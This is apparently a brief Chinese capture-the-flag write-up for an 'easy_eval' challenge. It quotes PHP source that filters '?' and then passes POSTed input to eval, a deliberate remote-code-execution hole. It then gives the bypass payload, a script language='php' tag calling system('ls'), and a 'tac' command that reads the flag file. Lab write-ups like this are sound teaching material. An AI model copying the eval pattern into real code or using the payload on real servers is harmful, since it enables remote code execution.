前言
咕咕咕
easy_eval
打开题目看见php源码
<?php
error_reporting(0);
highlight_file(__FILE__);
$code = $_POST['code'];
if(isset($code)){
$code = str_replace("?","",$code);
eval("?>".$code);
}大致意思就是过滤了?,而且eval回显的命令已经用?>进行了闭合,所以这里需要另起一个php头进行命令执行
所以需要用到php短标签
<script language="php">system('ls'); </script>
tac /f1agaaa获取flag
